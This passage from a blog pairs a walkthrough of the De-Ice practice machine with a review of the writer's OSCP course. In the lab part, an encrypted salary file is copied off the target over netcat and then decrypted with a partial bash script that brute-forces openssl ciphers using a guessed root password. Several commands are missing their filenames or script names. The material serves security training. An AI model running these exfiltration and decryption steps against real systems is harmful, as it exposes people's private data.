root@slax:/home/aadams# ls -lsaRhS /root/
root@slax:/home/aadams# ls -lsaRhS /home/

Here we are making use of the ls command (the equivalent of dir in windows) to list the the contents of these directories. The options used mean:

  • l – show the results in a list format which displays permissions and ownership
  • s – display the size of the file
  • a – display all files and directories, including hidden files and folders (files and folders starting with a .)
  • R – go through all folders recursively and list their contents too
  • h – make the file sizes human readable rather than in block format (4KB, 2GB etc)
  • S – sort by file size

I’m not going to paste the entire outputs of both commands due to size, but the following excerpt from enumerating the /home/ directory should show something interesting:

total 140K
140K -r-xr-xr-x 1 root root 130K Jun 29  2007 salary_dec2003.csv.enc
   0 dr-xr-xr-x 2 root root   80 Jun 29  2007 .
   0 drwx------ 3 root root   60 Jun 29  2007 ..

What’s this? An encrypted file? It is likely that this is the sort of treasure we are looking for. Let’s use netcat to transfer the file of of the machine. To do this we need to create a listener on our machine and pipe the traffic from the input into a file:

root@kali ~$ nc -lvvp 4444 > salary_dec2003.csv.enc

A quick run down of this command:

  • l – State that we are going to be listening
  • vv – Show extra verbosity
  • p – We are going to supply a port for listening
  • 4444 – This is the port will be listening on

Back on the ssh session of the target machine we are going to transfer the file through netcat to the listening port on our local machine:

root@slax:/home/aadams# cd /home/ftp/incoming/
root@slax:/home/ftp/incoming# nc -nvv 4444 < salary_dec2003.csv.enc

Be aware that netcat will not tell you once the file has finished transferring. It is a good idea to open another shell and do ls -ls salary_dec2004.csv.enc to check when the file has stopped increasing in size. Here is the output from both of the netcat commands:

On target system:

root@slax:/home/aadams# cd /home/ftp/incoming/
root@slax:/home/ftp/incoming# nc -nvv 4444 < salary_dec2003.csv.enc 
(UNKNOWN) [] 4444 (krb524) open
 sent 133056, rcvd 0

On local system:

root@kali ~$ nc -lvvp 4444 > salary_dec2003.csv.enc                                                                             
listening on [any] 4444 ... inverse host lookup failed: Unknown server error : Connection timed out
connect to [] from (UNKNOWN) [] 45972
 sent 0, rcvd 133056

Great we have the file, let’s check to see if it’s actually an encrypted file. We can use the file command on linux to try and identify it.

root@kali ~$ file salary_dec2003.csv.enc
salary_dec2003.csv.enc: data 

It says the file is data, well that’s no good, we’ll need to dig a bit deeper. Using strings and head we can get the string representation of the file, but just take the top of the file for inspection. This is a great way to check obscure file types and analyse them for identification.

root@kali ~$ strings salary_dec2003.csv.enc | head

After googling Salted__ header it seems that the encryption method used is openssl. openssl is an application that can be used to encrypt and decrypt files. But what algorithm was used to encrypt the file? This is where things might get confusing if you’ve never made scripts before. I have created a script that brute forces all the possible known cipher types used in the openssl program.

Here is the script I created to assist with this scenario.


# Usage:
if [[ -z $1 ]]; then
    echo 'USAGE: ./ <input file> <output file> <password> [cipher]'

# Arrange variables

# If a specific cipher is not given then
# get list of ciphers using by openssl
if [[ -z $CIPHER ]]; then
    CIPHER=`openssl list-cipher-commands`

#echo $CIPHER

# For each cipher type run the following command for each password
# (unless specific password given)
for c in $CIPHER; do
    openssl enc -d -${c} -in ${INPUTFILE} -k ${PASSWORD} > /dev/null 2>&1
    # Check to see if the command didn't fail the decryption
    # If it didn't alert user
    if [[ $? -eq 0 ]]; then
        # Display commands of possible decryption methods
        # Appends the cipher ont he end of the output file so more than one commands
        # Can be run at the same time
        echo "openssl enc -d -$c -in $INPUTFILE -out $OUTPUTFILE-$c -k $PASSWORD"
        #exit 0

Let’s put this script on our machine and run it. Wait a minute! What password should we be trying to decrypt with? Well if you remember the comment next to the root user in the /etc/passwd file (see below), it seems a safe bet to assume that the root user’s password is linked to the FTP, and since we found the file in the ftp’s folder it might be a good starting point.


Let’s now copy the script onto our machine, I’m going to do this with nano this time. nano is a simple command line text editor. I will paste the script into this file, save then quit.

root@kali ~$ nano ./

We now want run the script, for this to happen we need to give it executable permission. the command line application chmod will do this for us, it’s an important command to understand so I suggest reading up on it if you’ve never used it before.

root@kali ~$ chmod +x

Let’s create a folder called results to store the results of the decryption in as there might be false positives to sort through.

root@kali ~$ mkdir results

Now for the brute forcing. The syntax of the script is:

./ <input file> <output file> <password> [specific cipher] 

The file will not be outputted from running this script, but if decryption is successful then a command will be outputted which included the output location. The cipher type is added onto the end of the output files so they do not overwrite each other. If you want to try a specific cipher you can insert it at the end of the parameters if you wish. Let’s run the command and check the output:

root@kali ~$ ./ salary_dec2003.csv.enc results/salary_dec2003.csv tarot                                          
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-aes-128-cbc -k tarot
openssl enc -d -base64 -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-base64 -k tarot
openssl enc -d -bf-cfb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-bf-cfb -k tarot
openssl enc -d -bf-ofb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-bf-ofb -k tarot
openssl enc -d -cast5-cfb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-cast5-cfb -k tarot
openssl enc -d -cast5-ofb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-cast5-ofb -k tarot
openssl enc -d -des-cfb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-des-cfb -k tarot
openssl enc -d -des-ede-cfb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-des-ede-cfb -k tarot
openssl enc -d -des-ede-ofb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-des-ede-ofb -k tarot
openssl enc -d -des-ede3-cfb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-des-ede3-cfb -k tarot
openssl enc -d -des-ede3-ofb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-des-ede3-ofb -k tarot
openssl enc -d -des-ofb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-des-ofb -k tarot
openssl enc -d -rc2-cfb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-rc2-cfb -k tarot
openssl enc -d -rc2-ofb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-rc2-ofb -k tarot
openssl enc -d -rc4 -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-rc4 -k tarot
openssl enc -d -rc4-40 -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-rc4-40 -k tarot
openssl enc -d -seed-cfb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-seed-cfb -k tarot
openssl enc -d -seed-ofb -in salary_dec2003.csv.enc -out results/salary_dec2003.csv-seed-ofb -k tarot

Looks like there could be lots of false positives! Because we made the results folder earlier we’re good to go and run these commands. We can simply copy and paste them into the shell and they should execute without errors. We now need to identify which is the correct decryption format. A quick bash one liner should help us quickly find out:

root@kali ~$ cd results
root@kali ~/results$ for i in $(ls); do echo $i; grep -i salary $i; done                                                        
,Employee ID,Name,Salary,Tax Status,Federal Allowance (From W-4),State Tax (Percentage),Federal Income Tax (Percentage based on Federal Allowance),Social Security Tax (Percentage),Medicare Tax (Percentage),Total Taxes Withheld (Percentage),"Insurance

What did that one liner do?! If you’re not into programming or scripting the following might be alien to you, but I encourage you to understand it and try some simple scripts for yourself: they’re incredibly useful! This one liner is a simple for loop. We create a variable to contain all the names of files using $(ls). From here we reference each file name with $i. In each iteration in the loop we echo the file name, use grep to search the file for the string salary. I chose salary as it seems most likely to appear in the file given the file being called salary_dec2003.csv. Had this not been the case I could edit the one liner and choose another search term. The output we got was from the first file using the aes-128-cbc cipher. You can now cat this file and pipe it to less which gives you a friendlier way to view it

root@kali ~/results$ cat salary_dec2003.csv | less 

Well there you have it, we have rooted the machine and got some evidence to show for it. This would normally be the end but there is an additional challenge to fix the FTP server.

Bonus points?!

Now now, you don’t have to do this, it’s purely an added extra… I think? I wont go into too much depth here as I don’t think this part will interest many people. Looking back we were unable to identify the service version running on port 21. nmap suggested that vsftpd was running but returned an error. Let’s confirm that by searching for ftp configuration files in /etc.

root@slax:~# find /etc -name *ftp* -type f

This confirms that vstfp is running, nmap was correct! Let’s look at the find command used here more closely as it can be handy if you’re looking for specific files.

  • /etc – the directory we want to search in recursively
  • -name ftp – return everything with ftp in the name
  • -type f – only return results that are files

Let’s google the error that nmap gave us (which can also be seen when attempting an ftp connection to the target IP on port 21). After some googling we can find that this error may be given to us due to the following setting in the /etc/vsftpd.conf file:

# To run vsftpd in standalone mode (rather than through inetd), uncomment
# the line bow.

To check if vsftpd is running through inetd we can check netstat and see what service is running on port 21:

root@slax:~# netstat -antp | grep 21
tcp        0      0    *               LISTEN     9511/inetd

There, it looks like we need to edit /etc/vsftpd.conf and change listen=YES to listen=NO. Let’s make that change and attempt to connect to the port manually:

root@kali ~$ ftp
Connected to
220 (vsFTPd 2.0.4)
Name ( root
331 Please specify the password.
230 Login successful.

Hooray it works! Let’s use ls to list the files…

ftp> ls
215 UNIX Type: L8
500 OOPS: vsf_sysutil_recv_peek

Oh dear, somethings still not quite right! Back to google! It seems that a module needs to be added to the kernel to allow the vsftpd to function correctly. Let’s load this module and try and connect again from our machine.

root@slax:~# modprobe capability
root@kali ~/deice10010/results$ ftp                                                                                          
Connected to
220 (vsFTPd 2.0.4)
Name ( root
331 Please specify the password.
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
drwx---r-x    2 0        0              63 Jul 20  2006 Desktop
-rw-r--r--    1 0        0             323 May 02  2005 Set IP address
226 Directory send OK.
ftp> cd /home/ftp/incoming
250 Directory successfully changed.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-r-xr-xr-x    1 0        0          133056 Jun 29  2007 salary_dec2003.csv.enc
226 Directory send OK.
ftp> get salary_dec2003.csv.enc
local: salary_dec2003.csv.enc remote: salary_dec2003.csv.enc
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for salary_dec2003.csv.enc (133056 bytes).
226 File send OK.
133056 bytes received in 0.00 secs (46011.9 kB/s)

After connecting we were able to get a directory listing, change directory to the known ftp location and download the encrypted salary file!


You should now have a good grasp on how to tackle a vulnerable machine. Of course there are many other virtual machines out there that differ to this one, and new types of attacks will have to be learned to overcome their specific obstacles. The most important thing to take away from this machine is the gathering of information. A simple list of users enabled us to get into the whole system! Don’t take shortcuts. Remember to do your information gathering as much as possible in the beginning otherwise you may find yourself going through it all over again! What’s important to mention here is that we didn’t have to do much with the information we could out about the services. However in other challenges this information will be vital to make a successful breach.


Thanks for reading! If you reached this far, well done, it is a very long post and I don’t intend to do this for every vulnerable machine I write about. I hope those that read this managed to grips with the basic ideas and tools that are used in the penetration testing world.


Thanks to superkojiman for giving me a starting point for the decryption script!

The course

The Penetration Testing with BackTrack (PWB) course is one which covers a lot of topics and genres, will push you to your limits, and make you forget what sleep is. The remote lab covers multiple networks, each with machines varying in difficulty and types of vulnerabilities. I cannot go into too much detail due to the non-disclosure agreement students make with Offensive Security. The best insight as to what is covered in the course can be viewed here in the course syllabus (this is what got me initially interested in the course). Be aware that the lab book will go through a large selection of topics, but independent research will be required. Expect to be surprised in the labs.

To start with a few quick notes to people that might be reading this.

Le background

Before I start rambling on about my experiences and information about the course, it is worth noting my past experience. Before taking the course my main programming strengths were PHP and Java (guys don’t shoot me). I had some basic web app exploitation knowledge and a some Linux experience.

I was advised to tackle some free systems that have built-in vulnerabilities (listed at the bottom of this post). All of these applications were Linux based, they were fun to do and gave me deeper insight into service enumeration, web-based attacks and kernel exploitation. I am glad I decided to do these boxes as it gave me a bit of a starting knowledge. However, if you are new to this game as I was (and still am) the offsec course will throw a hell of a lot more at you than these machines will.

If you’re new penetration testing and have similar experience to me then this course may not be for you. I encourage you to read this post as I will attempt to put things into perspective about the time it takes, and the factors that helped me succeed in the time I did. Believe me when I say that if you’re new, it’s gonna hurt, it’s going to take time but it’s gonna be fun.

If you’re not new to penetration testing this course may be great as a “refresher” or something to do to get some additional practice. It may even be a case of doing it to get the cert for your resume. If you’re a fully-fledged pen tester you will probably (and hopefully) fly through the course.

Many thanks

I am very lucky to have and made a few good friends that have guided me and supported me throughout this course. Without them, I would not have learnt and grasped as much, and would certainly have not popped as many machines as I did. If you’re one of the people that helped me in this course (and you will know who you are) thank you for teaching me how to fish.

The adventure

I booked the 60 day option for the course, knowing that I would at least need this amount of time to get to grips with the materiel and make a good start on the labs. I made a point of downloading and looking at the course syllabus to see what I was letting myself in for. Well, to me it looked fun. The course covered a wide range of topics which tickled my fancy.

I took 2 weeks off my job at the time to work through all of the material. I took notes, screenshotted everything and completed near enough all of the exercises. For me, this is the only way for stuff to sink in (plus I wanted to get my money’s worth). I had half hoped I could get through the PDFs and videos quickly, however I found that even after my 2 weeks off work I still had some stuff to do. I put this down to my overly-keen documentation, but I don’t regret this at all. I now have a massive KeepNote file I can reference in the future.

I moved into the lab environment and quickly got to grips with a few of the tools described in the lab book. I started off by looking for the “Low Hanging Fruit”. See port X open, exploit with Y. I soon broke into a few machines using some of the basic exploits and vulnerabilities described in the material. After about a week I had a small collection of machines under my belt, and a lot of information collected.

It was at this point I felt I was tackling the course the wrong way. I started brute forcing my way into servers. I’m not going to let on exactly what I was doing because I don’t want to ruin the course for others. Long story short: I ended up taking “the easy route”. After chatting with a friend I could sense he was either face palming or shaking his head. After a small discussion I took it upon myself to break into the remaining machines (and the ones I had brute forced) through their intended vulnerabilities.

Now I know for a fact that in an actual penetration test, some of the techniques I used to pop boxes so quickly are vital (as time is usually of the essence). However, I did not want to go down this route as, for me at least, more knowledge was to be gained by breaking into machine the hard way. After I cleared my conscience I started popping through boxes again, I found that I was getting a lot more satisfaction and “awwww yeah!” moments when getting system/root on servers.

I extended the course by another 30 days so I could attempt to break into all the boxes. I really started picking up the pace at this point. I was popping at least a machine a day. The course material had finally sunk in better after some initial exposure to the labs; things were falling into place where they hadn’t before. I started to find myself thinking more logically about the problems I was facing with a tough box, thinking back to basics, and finding out stuff I had missed. I popped the majority of the machines when my lab time ran out. I also took the time to break into everything again, save commands used, their outputs and save the screen shots. I did this more for myself so I had something to look back on after the course. It took me a good couple of days to do this, but I don’t regret this at all.


I booked my exam around about a month after my lab time had finished. I relished the time to relax a bit and not have to spend endless hours on the course. Looking back, I think that a month was too long to wait for the exam. I would say two weeks would have sufficed, giving me time to finish writing the lab report and preparing for the exam. In fact, I think the exam would have gone a bit easier as the course material would have been fresh in my head.

The exam lasts for 24 hours, I decided to opt for a afternoon start and prepared myself with a bit of a lay in. It was probably one of the most intense 24 hours of my life but it was certainly worth it. Within 72 hours of submitting my lab and exam reports I got this in my mail box:

We are happy to inform you that you have successfully completed your Certification Challenge and obtained your OSCP certification.


Overall I really enjoyed the course. From starting with quite a small amount of knowledge I managed to gain a great understanding of the basics. Being thrown in the deep end is a great tool for learning, it makes you look up things that may not work, but at least you learn why it doesn’t work and gain additional knowledge from doing so. New or Professional, there is something in this course for everyone. Learn the basics, hone your skills, or get a certification for your resume.

Help and guidance The #offsec IRC channel on freenode is always active, and there should always be an admin around. You can get some “hints” with a specific machine you can !machinename in their IRC channel (some troll messages too). The forums are also a treasure trove of past posts that can be helpful if you’re stuck or if you’re having a problem with a particular box or lab module.

Course advice If you get stuck on a box try to think back to basics. Enumeration is the key! Look back on the techniques you learnt from the material to finger print, banner grab and enumerate services/web applications. Google is your friend! Try to solve things yourself before asking others, especially when the question is one you find the answer for in a 10 second google search. Finding the solution yourself will also give you a better feeling then if you’re just given the answers. Remember, in the real world, if you’re stuck trying to break into a machine whilst on a pen test, who is going to spoon feed you then? Don’t be too scared/lazy to read things! Try and do things the hard way if possible, the feeling you get will be great, and the amount of knowledge to be gained is worth it’s weight in gold.

Before taking the course Check out VulnHub (linked below) or similar sites to get a feel for what the course is going to offer. The machines I played with before starting the course:

  • Kioptrix Level 1
  • Kioptrix Level2
  • De-Ice Disk 1
  • De-Ice Disk 1.1
  • De-Ice Disk 2.1
  • DVWA (Damn Vulnerable Web App)

I would also suggest the following machines:

  • Metasploitable
  • Metasploitable 2

There are plenty of other free resources on the web, to list a few: